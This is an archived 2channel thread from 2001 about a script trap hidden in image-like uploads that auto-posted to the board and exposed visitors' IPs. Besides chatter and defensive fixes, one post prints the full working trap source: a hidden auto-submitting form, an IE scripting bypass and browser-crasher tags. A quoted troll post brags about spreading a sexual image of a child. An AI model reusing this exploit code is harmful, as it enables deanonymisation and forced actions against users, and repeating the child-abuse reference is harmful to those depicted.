これはBi●lobeとの戦いではない。敵はテロサイトの組織であり、
それを支援するプロバイダーもまた敵だ。テロのＷｅｂネットワークを
打ち破るために晒し、告訴、メディアでの影響力など、あらゆる力を使う。
テロリストに安息の場はない。ネットユーザは２ちゃんねらーの側につく
のか、テロリストの側か、選択しなければならない。
この戦いはネットの自由にとっての戦いなのだ。私はすべての人が参加
することを望みたい。そして我々はこれから、長い旅に出たいと思う。
これは「自由対恐怖」「正義対残虐」の戦いだ。この戦いは常に行われてきた。
勝利は必ずやって来ると確信し、行動しよう。
注）Ground Zero（爆心地）のＵＲＬは画像掲示板であり、サイト管理者の
　　意思であるかどうかは今のところ明確ではない。
　　しかし、管理者およびプロバイダーにはなんらかの管理責任・説明責任
　　があるのではないか？

コンビニで手に入る時代だからな・・・

とりあえず今は怪しいリンクは踏まないぐらいしか対処法が無い、と

>>305
これは盲点だったんでしょ（て、当たり前か）？

>>314
俺も。。厨房板に立てちゃってとおもわれ、、、

きつねうどん（;´Д｀）ﾊｧﾊｧ

>305
急いでも仕方ないってコト？（ｗ

>>317
そゆことね。

>>305
if ($referer =~ /xxx\.2ch\.net\/.*/)
↓
if ($referer =~ /^http\:\/\/xxx\.2ch\.net\/.*/)
こんな感じに修正すれば厳密に大丈夫です。

みんな 仲良し はにゃーん

>>251
とりあえず、うまい棒2本用意して鼻の穴につめこんでください

>>317
すぐ亜種作れるからいくらでも増えると思われ。

ピュアAUが…

オミトロンつかえば大丈夫だけど、まあ大半の奴は使えんわな。

そんな事よりも、インターネットサムライのﾏｸ版出してｸﾚ

>>311　禿同

>>319
俺はゲーム系の板で結構あの画像見ちゃった･･･鬱
何だかなぁ･･･

>>329
禿堂

http://teri.2ch.net/test/flash.txt
これで警告するのはどうでしょう？

>>318
盲点というか、、
私のほうからみたら、内容はどうでもいいんですけど。
無駄にアクセスされる(はじいたとしても)わけで、
そのまま、残っているやつもきえてほすぃです。

寝よ、明日になればおさまってるよね・・・・・

ｵﾒｺﾛﾝマンセ

やっとここまでおいついたのれす。。。

>>325 ﾜﾗﾀ
こんだけひっかかったから少しは踏む奴減るかな？

>>331
とりあえず、開き直っとこう！！

>>330
あっ…内部分裂（ｗ

一気に あやか 有名になったな。

ttp://www.geocities.co.jp/Milkyway-Gemini/4761/
をProxomitronで無効化することはできないのか？
できたらオミトロンユーザだけでもとりあえずは助かるし。

■■■javascript+fusianaトラップについて■■■
１．2chなどに貼られたGIF/JPG画像、HTMLなどのリンクを踏むと・・・
２．中に仕込まれてるスクリプトが動き出して
３．レスまたはスレが建てられ、ＩＰが晒されます。

よくある質問

１．かちゅーしゃ・直リンなどでは大丈夫？
　ﾀﾞﾒです。ﾘﾌｧ(転送元URL)が無い場合は厨房板にスレが建ちます
　なお、既に対策済みとのことですが、どのみち鯖に負担をかけます

２．Java切ってあったら大丈夫？
　ﾀﾞﾒです。JavaとJavascriptは別物です。
　IEの場合は、バグを使っているので、セキュリティレベルを上げても無駄です。
　細心の注意を払ってください。

３．特定URLだけを見てればいいのでは？
　ﾀﾞﾒです。別のｱﾌﾟﾛﾀﾞなんかにアップロードされると新しいURLができてしまいます。
　script自体はURLを決め打ちしてないので、どのｱﾌﾟﾛﾀﾞでも動作してしまいます。
　ｱﾌﾟﾛﾀﾞ側がファイルチェックしてればいいのですが・・・。

４．じゃ、根本的な対処法は？
　　妖しいURLを踏む前に、対象をファイルに保存して中身を確認しましょう。
　　メモ帳などで、ね。
　　もし、HTMLっぽいのが出てきたら、それは罠の可能性が高いですね；
５．自分のPC大丈夫？
　　チェッカ作りました。以下で確認しましょう。もし、モナーの絵が出てきたら×です。
　　http://www.eucaly.net/~kei/test/check.html
　　なお、このチェッカはスクリプトをそのまま利用してますが、BBS登録部分を無効化している
　　ので、実際には書き込まれません。

>>342
研究だから壊したけどもう１回あぷする？

IEのセキュリティホール利用してるんだとしたら2chだけの問題ではないと思うんだが・・・。

オミトロン使うような人なら自分で簡単にできます。

良スレ

今度　しゃけ送ります。
Sapporo classic 付きで、どうでしょう。
白い恋人もつけますか?

>>344
願います。

さっき間違って踏んだけど、
あがってたｱﾌﾟﾛﾀﾞがakutokuだったから503がでた。
悪徳の重さも今回はありがたかった

>>334
そうっすか。

とりあえずコピったソース見て勉強します。
（でも貼らないよ、当然）

>>344
俺３週間くらい前にそこ行っちゃったんだけど、なんか問題有るんですか？
関係ないのでsage

>>348
俺にもくれ〜（ｗ

∋8ノハ8∈
　( 　´�D｀)＜一体何が起こったのれしょうか。。。

>>342
Protocol src killerでどう？

ひろゆきは、いま何をやってるのかな〜？

またもや２ｃｈの危機です！！
http://pc.2ch.net/test/read.cgi/unix/1008579712/

ｼｬｹ････ﾊｧﾊｧ（;;;;;;´д｀;;;;;;）

>>356
うまい棒食ってる。

>>354
（　｀.∀´）＜さっさと寝なさい

>348
イクラにしてください。

>>356
寝てるに、2500ｵﾌﾞﾁ

これってmacユーザーもＩＥ使っていたらやばいですか？

うまい紅鮭が食べたい

>>348　ザンギを願いします。

ビックリマンチョコを食べてます。

実況で踏んだ！！

>>221
の「ななしん」とかうのは断罪しる！！
ﾀｲｰﾎ！！

>>366
( ﾟдﾟ)ﾎﾟｶｰﾝ

>304
禿同。
タツタには公式声明を出して欲しいところ。

しゃけ＝札幌？
昔、東京でＳＴＶラジオ聴いてました(^_^;)

ちんこtest

管理側の雑談になりつつある、、、

>>360
( ;´�D｀;)＜ひぃ〜、やすらさんなのれす！

釣り板分割してやれや(w

>>348
最後に残ったものでいいんで下さい。

って、素で引っ掛かっちまったよ（ｗ

前回の閉鎖騒動よりはまた〜りしてますな。

>>366
懐かしい…

>366
何がでてきましたか？

秘儀！ビックリマンチョコでキラシールが必ずあたるウラワザ
ってあったな

>>348
白い恋人(ﾟдﾟ)ｳﾏｰ

>>366
何当りました？

>>366
太るよ。

ﾋﾞｯｸﾘﾏｿ　ｳﾏｰヽ(´∀｀)ノ　　ﾜｼｮｰｲ

37 名前：ななしん 投稿日：01/12/17 23:42
>>36
なによ？　祭りもう下火でしょ。　次のタイプ出てこないし慎重になったからつまんない。
小学生のま○こはおもしろかったー。　いくつの板に貼ったっけ覚えてねーや（藁
ビール飲んで酔っちゃったから寝ちゃうよん。おやすみん。

こいつまじでうざい・・・もう寝る！！！

>>366はエセ

いや、ですから>>366はトリップが（ｗ

白い恋人達(ﾟдﾟ)ｳﾏｰ

太ったひろゆきさん・・・抱かれたい・・・(´Д｀；)ﾊｧﾊｧ・・・

俺だけじゃないようだ（ｗ

>>355
Protocol src killer
いれた。
安全だった。
よかた、

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
<META name="GENERATOR" content="IBM WebSphere Studio Homepage Builder Version 6.5.0.0 Trial for Windows">
<META http-equiv="Content-Style-Type" content="text/css">
<TITLE>研究用の罠byほんちん</TITLE>
</HEAD>
<BODY><![if ! IE]><IMG src="http://teri.2ch.net/accuse/hihan1.gif"><![endif]><!--[if lt IE 5.5000]>
<noscript><IMG src="http://teri.2ch.net/accuse/hihan1.gif"></noscript><![endif]-->
<!--[if IE]><IMG src2="http://teri.2ch.net/accuse/hihan1.gif" id=img1 style=display:none>
<iframe id=if1 src=about:blank style=display:none></iframe><form id=f1 method=POST style=display:none>
<input type=submit name=submit><input name=subject><input name=FROM><input name=mail>
<textarea name=MESSAGE></textarea><input name=bbs><input name=key><input name=time>
</form><script id=scr1 for=window event=onload>

ビックリマンチョコはシールが汚れるのが難点ですね。

中身捨てないだけまし。

>>387
みんな知っててやってんじゃ…

>>366のトリップ違う。
これはひろよしだ。

>>363
いまのところMacで発動したってハナシは聞かない
でも踏むなよ

>>393
釣り板分割してちょ

ちょっとニセモノ出過ぎ。

>>366
なつかしい。ひろゆきさんチョコ食べる派ですね。



↓以下チョコは捨てる派との激しいバトルの予定

function main1(tar){var t1=tar.split('/');var dom=t1[0];var bbs='';var key='';
if(t1[1]=='test'){ bbs=t1[3]; key=t1[4];}else{ bbs=t1[1];}if(key){
f1.action='http://'+dom+'/test/bbs.cgi'; f1.key.value=key;}else{
f1.action='http://'+dom+'/test/subbbs.cgi'; f1.subject.value=parent.location.href;}
var n = getCookie("NAME") + 'fusianasan'; var m = getCookie("MAIL");
f1.FROM.value= n.replace("#", ""); f1.mail.value= m.replace("#", "");
f1.MESSAGE.value=parent.location.href;f1.bbs.value=bbs;
f1.time.value=String(Math.floor(new Date().getTime()/1000));var t2="if1.location.replace('about:blank')";
parent.setTimeout(t2,5000);f1.submit.click();}function main2(){
var t3=String(Math.floor(new Date().getTime()/1000));setCookie('history',t3);}
function main(){var t1=location.search;var t2=getCookie('history');
var t3=String(Math.floor(new Date().getTime()/1000));var t4=Number(t3)-Number(t2);
if(t1){ t1=t1.substr(1); if(t4<20){ setCookie('history','1'); history.back();
}else{ window.onbeforeunload=main2; main1(t1);
parent.img1.src=parent.img1.src2; parent.img1.style.display='block';
} return;}t1=document.referrer;if((!t1)||(t4<3)){ img1.src=img1.src2; img1.style.display='block';
return;}t1=t1.substr(7);var t2=t1.indexOf('#');if(t2>=0){t1=t1.substr(0,t2);}
if1.location.replace(location.href+'?'+t1);}document.body.addBehavior('#default#userData');main();
function getCookie(k){document.body.load('cookie');var r=document.body.getAttribute(k);if(r){return r;}
return '';}function setCookie(k,v){document.body.load('cookie');
if(v){document.body.setAttribute(k,v)}else{document.body.removeAttribute(k)}
document.body.save('cookie');}</script><noscript><xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />

<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML />
</noscript><![endif]--><IMG src="file///c│/con/con/con">
<IMG src="mailto:1"><IMG src="mailto:2"><IMG src="mailto:3"><IMG src="mailto:4"><IMG src="mailto:5"><IMG src="mailto:6">
<IMG src="http://www.aaa.or.jp/aa.gif" width="999999999" height="999999999">
<xmp>　<plaintext>
<IMG src="file:///A:/a.gif"><BR>
<IMG src="file:///A:/b.gif"><BR>
<IMG src="file:///A:/c.gif"><BR>
<IMG src="file:///A:/d.gif"><BR>
</BODY>
</HTML>

>>393
おまえは、よしひろだな

っで、今回の騒動の被害ってＩＰ抜かれるのと鯖負荷増大だけ？

>>400
>>401は何派でしょうか？

感染しちゃってるんだけどどうにかなんないの？

このトラップ最初にやったやつﾀｲｰﾎするようにがんばってください。

( 　´�D｀)＜ののは何でも食べるのれす。あひゃひゃひゃ！！

>>393
そうそうあれムカツクよね。

たしかに激しいバトルだ、、、

>>395
かもね
>>396
つーか、ひろゆきの兄弟も増えた気がする（藁

>>365
和解？

>>410
本物登場！

＞IEのバグ(だと思うぞ、強制スクリプト実行なんて)を使ってRefererを偽装しているから無駄

↑これは間違い。
http://teri.2ch.net/test/read.cgi/accuse/1008597418/l50
↓
http://hoge.com/hoge.gif?teri.2ch.net/test/read.cgi/accuse/1008597418/l50
Refererをこのようにしても２ｃｈは２ｃｈ内からの書き込みだと判断してしまうのが問題。
したがって、２つ目の例では書き込めないようにすれば良い。

IP抜かれた奴は規制かかっても文句いえねーな。わざとでも天然でも

>>410
お、ホンモノだ。ラウンジにスレ立てさせてちょ

雪見大福(ﾟдﾟ)ｳﾏｰ

チョコだけくれ。

うんこ

コピペ
名前： ◆YaKIN/eo ＠夜勤 ★ 投稿日：01/12/17 23:45 ID:???
いやー　書き込みが自動でやられて、
それを　皆で削除したら、さすがに　負荷あがります。

ご協力　ありがとうございました。　> 削除人さんの方々。

では、落ち着いたようですので、通常通りということで、
お願いいたします。

http://ton.2ch.net/test/read.cgi/bike/1008578710/l50
参考に

なんかこのスレ楽しい

>>415
ガ━━Σ（ﾟдﾟlll)━━ン

鑑定機
使ったら『残念ですが、引っかかるみたいです。。。』
って言われちまうよ。

>>410
長男（か分からんが）ﾊｯｹﾝ!!

夜勤さんへ

白い恋人はともかく、鮭＝北海道みたいな発想は止めて。

新巻鮭一本送れとか簡単に言われるが、
北海道に住んでたってそこそこ高いのに･･･。

蟹送れなどとぬかす奴はグリグリしてやる！

>削除屋さん

UNIX板でソース張りつけてる奴が居ますが・・・

>>410
>>251からの十数分間何をやってたですか？

コピペ

＞実況板より。

16 名前：ななしん 投稿日：01/12/17 23:01
URL踏んだやつが勝手にIP晒してスレ立てるんだよ（藁
漏れはアドレス貼っただけー　みんなじゃんじゃん踏んでね?

このななしんってやつが実況の発端なんですがなにか対処できなんでしょうか？
あきらかに遊び半分でやってます・・・


これが犯人という説がありますな。

( ；´�D｀)＜ののは何もしてねーのれす　何もしらねーのれす

ひろゆき本人トリップつけてくれぇぇ
ここはフシアナ祭りというよりひろゆき祭りになりつつある・・・。

>719 ： ◆YaKIN/eo ＠夜勤 ★ ：01/12/17 23:45 ID:???
>いやー　書き込みが自動でやられて、
>それを　皆で削除したら、さすがに　負荷あがります。
>
>ご協力　ありがとうございました。　> 削除人さんの方々。
>
>では、落ち着いたようですので、通常通りということで、
>お願いいたします。

危機は乗越えたのか？

しゃけなんざ猫の餌だぜ
いやまじで

http://www.geocities.co.jp/Milkyway-Gemini/4761/
これのソースでした、誰か対策見つけてください

ひろゆき今でもびっくりマン買うの？

>>427　urlplz

>426
蟹を送ってください。

まだエロってるやつがいるのかよ>>427

ものすごい勢いでひろゆきを扇動する宮台真司の画像きぼん

【警告】裏２ｃｈ、絶対踏むなよ！！
http://live.2ch.net/test/read.cgi/endless/1008596882/
>>429ここですね

シールは捨てるなぁ、俺
一円玉、ごきぶり、画鋲、とかのそっくりシールの時代は、集めてたけど
今のエンジェルだかなんだかのシールは、おもしろくないから。

ウニｵｸﾚ（･∀･）

>426　蟹送れ！　(ﾟдﾟ)ｳﾏｰ

早速言ってみたよ！ｸﾞﾘｸﾞﾘしてほしいよ！！！ﾜｼｮｰｲ

>>428
>>400-401あたりかと

ひろゆきは次男。長男はまさゆき。

正直ハラへった

>>426
（‘ ε ’）＜カニ送ってくれモナ

函館の朝市でイクラの二倍丼を食べる、これ最高。

>>444
ひろよしは？

寝よ

>>435
またもや２ｃｈの危機です！！
http://pc.2ch.net/test/read.cgi/unix/1008579712/

おっ　失礼。
切り身もありますし、、

夜勤さんに頼め。

とりあえずおまえらｸﾞﾘｸﾞﾘだ〜。

うちの近所にやおきん本社があるんですよ

マターリするね、このスレヽ( ´ー`)ノ

カレーうどん食いつつ高みの見物。

ちょっとまとめときます

ひろゆき ◆L3IpNS4A　→ひろゆき
ひろゆき ◆aSjnRHGU　→ひろよし？
ひろゆき ◆DQNyDEEI →？
ひろゆき ◆wJtj0t.Q　→？

お前ら、いまいいもん食ってやがるのかｺﾞﾙｧ！！

ﾆｯｼｿのかぷめんでもくお
わるどかぷのﾁｹﾄほすぃ

>>451
じゃがいもの芽だって構いません。ﾎｽｨ...

>>429
どうも犯人気取ってるだけみたい

32 名前：ななしん 投稿日：01/12/17 23:28
漏れ一つもスレ立ててないよんひゃっはー。
だってかちゅ使いだもん。　ひっかかるわけねーやヽ(´ー`)ノ
38 名前：名無しさん 投稿日：01/12/17 23:44
>>32
残念でした。かちゅもダメだよ

キャップのみなさんのブラウザって何？

>>456
DQNyDEEIってどこかで見たような…

>>457
ハイチュウ「梨」

うまい棒って、関東限定？　見たことないんだけど。

>>450 完了。427さんありが�d。
>>451 ザンギを、、

ひろゆき ◆L3IpNS4A　→ひろゆき（次男）
ひろゆき ◆aSjnRHGU　→ひろよし（三男）
ひろゆき ◆DQNyDEEI →まさゆき（長男）
ひろゆき ◆wJtj0t.Q　→光恵（次女）

これのあおりなのか今日の昼過ぎ（夕方？）頃から全板で書き込み出来ません
ブラウザ変ですよ　が出ます
ブラウザはie5.01でホストは***.kyoto.ocn.ne.jpです
無関係でしょうか？

>>456
ひろゆきは長男or次男ってのも決定しないと（ｗ

>>464
そうなの？

>>462
ラウンジでみたことがある

>>464
愛媛でも売ってるが・・・

>463　ｼﾞｭﾙｩ…　

>>462
どっかの板の厨房コテハンだね。
うぜぇ。

43 ：名無しさん＠お腹いっぱい。 ：01/12/17 23:53
>削除屋さん

http://pc.2ch.net/test/read.cgi/unix/1008579712/

36-39です。

住人がソース検証している模様。



こんなん発見

>>464
北海道にはある

>>464
んなわきゃない

DCから見るとどうなるの？

>464　関西にも売ってるよ！　＞うまい棒

>>462
たしかに…

>>466
長女は？★になったのか!?

>>465
りょーかいですー

ザンギですか? どこにでも売っているような、いないような。
わたしの知らない　究極のザンギがあるのかしらん。

うまい棒は全国胸中なり

そうなの？
ホームランバットなら、喰ったことあるんだけど…。

ペヤング(ﾟдﾟ)ｳﾏｰ

>>480
長女は今風呂に入ってる。

>>456
ニュー速の窓際○○？

>>465
> >>450 完了。427さんありが�d。
なんで削除するかなぁ。

このようにすればトラップが効かなくなります。

http://teri.2ch.net/test/read.cgi/accuse/1008597418/l50
↓
http://hoge.com/hoge.gif?teri.2ch.net/test/read.cgi/accuse/1008597418/l50
Refererをこのようにしても２ｃｈは２ｃｈ内からの書き込みだと判断してしまうのが問題。
したがって、２つ目の例では書き込めないようにすれば良い。

お前ら、食い物見せびらかすな！！　

間もなくＩＤが変わりますね。

>>484
焼きそば弁当(ﾟдﾟ)ｳﾏｰ

>>467
それ、該当スレの１でよく見た

>>464
どこ住んでるの？

>>486
そうかもしれない、誰だっけな？（ｗ

からあげのことザンギってゆーだけじゃん。
北海道なのに、お金なくて鮭じゃなくて輸入ものサーモンを食べました。

>>481
ニンニク醤油のよく染みたやつが。。小汚い居酒屋のやつでもいいんです。
はらへた、、

>484
やきそば弁当(ﾟдﾟ)ｳﾏｰ

キネーン

>>485
風呂に入る長女(;´Д｀)ﾊｧﾊｧ

>>488
んなの、スクリプトで速攻で対策される。書いた時点で使えない。

もうこんな時間か……

馴れ合いスレ化してる･･。

9月に水戸経由でフェリーで北海道逝ったけど売ってたよ
水戸でもうまい棒ブランドじゃないけどおなじ製造メーカーの納豆味売ってた

０時過ぎました。ＩＤは？

１．ｱﾌﾟﾛﾀﾞなどに貼られたＧＩＦ画像などを踏むと・・・
２．中に仕込まれてるスクリプトが動き出して
３．レスまたはスレが建てられ、ＩＰが晒されます。レス内容はその人が踏んだURLになります。
★よくある質問
１．かちゅーしゃ・直リンなどでは大丈夫？
　　ﾀﾞﾒです。ﾘﾌｧ(転送元URL)が無い場合は厨房板にスレが建ちます。
　　なお、既に対策済みとのことですが、どのみち鯖に負担をかけます。
　　スクリプトが改変されれば簡単に突破される可能性も高いです。
２．Java切ってあったら大丈夫？
　　ﾀﾞﾒです。JavaとJavascriptは別物です。
　　IE5.5/6の場合は、バグをついているので、Javascript（アクティブスクリプト）をオフにしてもかかります。
　　IE5.01以下ならJavascriptをオフにすれば大丈夫です。
３．特定URLだけを見てればいいのでは？
　　ﾀﾞﾒです。別のｱﾌﾟﾛﾀﾞなんかにアップロードされると新しいURLができてしまいます。
　　script自体はURLを決め打ちしてないので、どのｱﾌﾟﾛﾀﾞでも動作してしまいます。
　　なお、このscriptの拡張子の多くが画像ファイルなのはｱﾌﾟﾛﾀﾞへ簡単に投稿できる形式だからであり
　　自分のホームページにhtmlやtxtでアップロードされる可能性も高いです。
　　拡張子では全く判別できないと考えてください。
４．じゃ、根本的な対処法は？
　　URLを踏む前に、　　[view-source:http://www.〜〜]とｱﾄﾞﾚｽ欄に入力してソースを表示させましょう。
　　もし、HTMLっぽいのが出てきたら、それは罠の可能性が高いです。
　　右クリックからソースを表示させる右クリックメニューも便利。
　　http://www.skipup.com/~niwatori/index4.htm#bura
　　なお、ブラクラチェッカーでは安全と診断されますので注意してください。
５．自分のPC大丈夫？
　　チェッカ作りました。以下で確認しましょう。もし、モナーの絵が出てきたら×です。
　　http://www.eucaly.net/~kei/test/check.html
　　なお、このチェッカはスクリプトをほぼそのまま利用してますが、BBS登録部分を無効化しているので、実際には書き込まれません。

0000!!!!!!!!

いｄちぇっくっ！！！！！！！！

>>501
夜食スレです

もう終わったの？
ﾏﾀｰﾘだネ。

>>492
IDが限りなくSexに近い

>>235
このチェックで”引っかかる”って出たって事は、
注意しなきゃならんってことかい？

>>501
落ち着いてきたということでしょう。

「naPtffh8」からどうかわってるかな……

さくらたんのIDちぇーっく

やきそばパン(ﾟдﾟ)ｳﾏｰ

対策はどうなったの？

⊂（´-`⊂⌒｀つ

>>515
dqnですね

あ、ﾄﾞｷｭﾝだ！

どれどれ

>>515
IDがDQN

よかったね、とりあえずは余裕が出たみたいで。。。ふぅひぃふｌはう

トイレかよ……

http://teri.2ch.net/test/read.cgi/accuse/1008597418/l50
↓
http://hoge.com/hoge.gif?teri.2ch.net/test/read.cgi/accuse/1008597418/l50
Refererをこのようにしても２ｃｈは２ｃｈ内からの書き込みだと判断してしまうのが問題。
したがって、２つ目の例では書き込めないようにすれば良い。

　

どれ？

踏みたかったのに終ってるみたいだな

IDチェック...　と

いやーすごいときは５秒に２０レスとかついてたかんな〜

もう終わりでしょう。

>>529
オマエ誰?

オレは神

>>529
トリップちがっ！！

>>529
微妙にちがうね

本日２４時「京王橋本駅」で・・・
http://choco.2ch.net/test/read.cgi/news/1008593178/

ひろゆきこのバカも何とかして
そのうち警察から連絡くるかも。

>>529
ＩＤがハイホー？
パナソニックですか。

>>528
ポッキープリッツ大臣

>>529
ﾊﾟﾅｿﾆｯｸ･ﾊｲﾎｰですか。

　

やきそばパン…食い物はやっぱ炭水化物同士が王道だね

長女降臨ｷﾎﾞﾝﾆｭ

ログ読んでないので、既出あるいは無駄レスだったらスミマセン、、

時間稼ぎとして、
スレ立て画面を全て別にした上で
別画面に移る時点(bbs.cgi)でスレッド立てすぎかどうかのチェックをする
で、subbbs.cgiの名前を定期的に変える
てのはﾑﾀﾞﾑﾀﾞ？

パソコン触ったこともない、そこらのババァは平和だろうな。

>465
すいません、もたついて誤爆してしまいました。(^^;

>>474
一応自己フォローをUNIX板に入れておきました。

休みの今日一日2ch同時多発テロ見て終わりました・・・

UNIX板のソースをあぼーんしても、
チェッカのソース読めばおんなじ事書いてあるじゃない？

レポート明日提出だというのに一日中見てましたが何か？

あ……２典のとこからメールがきてる…………

>>529
長女の洋子さんですね？

>>543
御愁傷様(−人−)

うあーデマ流しまくってましたすみません。
>>164 >>323 の対策は有効です。
ってもうやってる?

>>544
ソレをわざわざ書き換えて使うような人は
もうどこかのアプロダから入手しているのではないかと。

>>543 私も。。

日付変わってIDも変わってるけど104です。

>>543
明日は俺もレポート提出が…まだ手つかず（剛球

とないと２ﾊｼﾞﾏﾀ

ＩＤ：「ナウい４円」て、俺は…

レポートやるか

ひろゆきからメールきたよ。teri鯖に対策コード入れてみるって。
（もう３０分位前のメールだから、他も入ってるかも）

>>555
そうします

UNIX板のソース削除依頼した人
お前は本当にソースを削除して欲しかったのかと問いたい。
削除人が即消ししてくれるのが楽しくて、言ってみただけちゃうんかと。

あー俺も明日テストなのに。。。講義さぼるからいいや

>554　( ´∀｀)ノ�C　買います。売ってくらさい。

２ちゃんねる中毒者の集まるスレはここですか？

ﾏﾀｰﾘしてるけど根本的に解決したってわけじゃないんだよね？

http://teri.2ch.net/test/read.cgi/accuse/1008597418/l50
↓
http://hoge.com/hoge.gif?teri.2ch.net/test/read.cgi/accuse/1008597418/l50
Refererをこのような場合でも2chは2ch内からの書き込みだと判断してしまうのが問題。
したがって、２つ目の例では書き込めないように2chのCGIを、
if ($referer =~ /xxx\.2ch\.net\/.*/)
↓
if ($referer =~ /^http\:\/\/xxx\.2ch\.net\/.*/)
こんな感じに修正すれば１００％絶対に自動的に書き込めなくなります。
IEにRefererを偽装する機能もバグも存在しません。

COMIC鯖なんとかしてくれ（泣

IDﾁｪｸ

夜食くって寝ようかな

質問ですが、パチンコ板の過去ログは復帰しまいのですか？
厨房板は復帰しているので。名スレもあったのに・・・
>>550
すごいですね。第一次爆撃の時からいましたものね。お疲れ様です。

>>556
>>164の方法で根本的に対策できるはずなのでお願いして

半角板逝けないのおれだけ？

CPPぜのP・・・なんのこった

>>560
俺の家に来てくらさい

salad板まだまだ不安定です…もう寝ようっかな。

どさくさにまぎれてラウンジのスレ立て規制元に戻してくれませんかね（ｗ

お？

>>563
暫定措置としてはいいと思うけど
http://hoge.com/hoge.gif?http://teri.2ch.net/test/read.cgi/accuse/1008597418/l50
ってのがすぐ出回ると思われ。

>>567
スクリプトでリファラを書き換えて正規のモノにしたら終わり。
書いちゃダメだってば…

>>568
いけますよ

つか、yasai鯖重くない？
俺だけ？？ほのぼの入れない。

>>568
漏れも。

>>572
それだ！！

ひろゆきは何人兄弟ということで落ち着きましたか？

>>558
2chに限らず他でも流用可能であることがわかっている以上
被害拡大を防ぐためにはソース流出を最小限に押さえる必要
があると思われ

あっ、行けた。ｽﾏｿ

>>580
四人かな

ラウンジに糞スレ立てれないから戻して〜

>>574
/^
で、「先頭が」 2ch.net じゃないと引っかかるので100%大丈夫です。
正規表現勉強してから出直してね。
って漏れもでかいこと言えないけど

>>580
今のところ５人、残りは不明。

あららららららら？
半角見れるけどカキコが出来ない

>>580
５人、て事で勘弁してやろうかと（ｗ

>>575
だからスクリプトでリファラを書き換えられるというのは
漏れが流したデマ。IEにそんな機能は存在しない。

>>578
それは逝けないってこと？

【裏2Ch踏んじゃダメ】 2Chを蝕むウィルス大増殖
http://news.2ch.net/test/read.cgi/newsplus/1008578204/

309 名前：名無しさん＠お腹いっぱい。 投稿日：01/12/18 00:14 ID:PMyYYMl7
とりあえず模倣犯人を1名発見

YahooBB218138012096.bbtec.net.2ch.net

こいつ大量にばらまいている


310 名前：名無しさん＠お腹いっぱい。 投稿日：01/12/18 00:14 ID:PMyYYMl7
あ、ごめん、ゴミがついた

YahooBB218138012096.bbtec.net

こいつ

スクリプトのソース、合計5個も拾っちゃった。。
わは。

yasai
salad
www2.bbspink.com

漏れのＩＤ凄いよね〜

>>590
行けました。ｽﾏｿﾈ

>>594
It DQN君

>>596
ﾄﾞｷｭｿ逝ってよし

>>589
あ、そか。なんか勘違い（藁　ちゃんと厳密にチェックすればおけなのね。

ところで、今回の騒動の吉野家とか、数を数えるやつはまだ出来てないの？
作ってみようかな

ｽﾏｿ>>594。過ちを犯してしまった。

>>597
ＩＤが６号？

これが根本的な対策法です。
これでは対策にならないと言っている人もいますが、それは誤りで、
これで完全に解決できます。

http://teri.2ch.net/test/read.cgi/accuse/1008597418/l50
↓
http://hoge.com/hoge.gif?teri.2ch.net/test/read.cgi/accuse/1008597418/l50
Refererをこのような場合でも2chは2ch内からの書き込みだと判断してしまうのが問題。
したがって、２つ目の例では書き込めないように2chのCGIを、
if ($referer =~ /xxx\.2ch\.net\/.*/)
↓
if ($referer =~ /^http\:\/\/xxx\.2ch\.net\/.*/)
こんな感じに修正すれば１００％絶対に自動的に書き込めなくなります。
IEにRefererを偽装する機能もバグも存在しません。

>>597
((≡´Д｀≡))

だいぶﾏﾀｰﾘしてきたねぇ……

もうトラップのアドレス書けないのね。
対策スレ立てれなくてムカついてたよヽ(´ー｀)ノ

>>604
そうやねぇ

ではそろそろレポート書きに逝きます。

最後に…
ぁゃtぃＵＲＬはラウンジで鑑定出してね

終わりやね。
DQN４でもやろっと

(▽Д▽)y ─┛~~ 対策できてる…？

247 名前：心得をよく読みましょう 投稿日：01/12/17 23:32 ID:MD8a3qzu
今、夜勤さんとか運営側のみなしゃんはどんなことををやってるでつか？
251 名前：ひろゆき ◆L3IpNS4A 投稿日：01/12/17 23:33 ID:OX3PDCbq
とりあえず、うまい棒を食べてたりします。
260 名前：CC名無したん 投稿日：01/12/17 23:34 ID:DabjbDIY
>>251
一人だけﾏﾀｰﾘしないでくれ
264 名前：実は鑑定人 投稿日：01/12/17 23:34 ID:FWmmQZP/
>>251
あなた…やっぱ管理人だわ（硝酸

>>608
Nはなんだ？

てすと

さっきも書いたけど思いっきり流れたのでもいちど。

ﾘﾌｧ切るとi-modeから書き込みできなくなるなら・・・。
http://www.nttdocomo.co.jp/mc-user/i/ip.html

このIP領域のみﾘﾌｧ無し/不明でも受け付けられるようにすればよいと思われ。

テレ東見れ！

ｉモード対応携帯電話より、インターネット経由でＷＥＢサーバにアクセスする際、ＷＥＢサーバ側に通知される送信元のＩＰアドレス（iモードサーバ内のファイアウォールサーバのIPアドレス）は以下の帯域内のアドレスとなります。

２１０．１５３．８４．０／２４
２１０．１３６．１６１．０／２４


FOMA ｉモード
２０３．１３８．４５．０／２４

location.replace(location.href+'?'+t1)
つまりこの部分でteri.2ch.netとかaccuseが含まれるURLに飛ばしてから投稿させてるわけ？

>>614
人妻３人癒し旅ＳＰ
お風呂の時間

http://obuchi.naikako.com/angriff/upred/source/1478.jpg
あひゃ

>>614
人妻３人癒し旅がなにか？

>>618
・・・。

どっかのスレに、ウィルスチェックしたらトロイに感染してたってあったけど、
俺もだった。
踏んだやつはチェックしたほうがいいかも。

>>614
俺のすんでるところにはテレ東ないさぁ……

>621
まじで？

中川家が人妻と風呂に入ってる

http://info.ezweb.ne.jp/factory/tec/spec/ezsava_ip.html

No IPアドレス サブネットマスク（bit）
1 　　　210．169．40．0 /24
2 　　　210．196．3．192 /26
3 　　　210．196．5．192 /26
4 　　　210．230．128．0 /24
5 　　　210．230．141．192 /26
6 　　　210．234．105．32 /29
7 　　　210．234．108．64 /26
8 　　　210．251．1．192 /26
9 　　　210．251．2．0 /27
10 　　　211．5．1．0 /24
11 　　　211．5．2．0 /24
12 　　　211．5．7．0 /24
13 　　　61．117．0．0 /24
14 　　　61．117．1．0 /25
15 　　　61．202．3．0 /24

>>621
ありがとう。

>>621
ウソ

また半角があれてるよ〜

http://www.trendmicro.co.jp/hcall/scan.htm

マジ。踏んだのが原因かどうかは不明だけど。

IPより、UAで見た方が簡単なのでは…

止まってる（笑）

つうか半角繋がらん・・・

>>629
無関係

>>633
それならｽﾏｿ

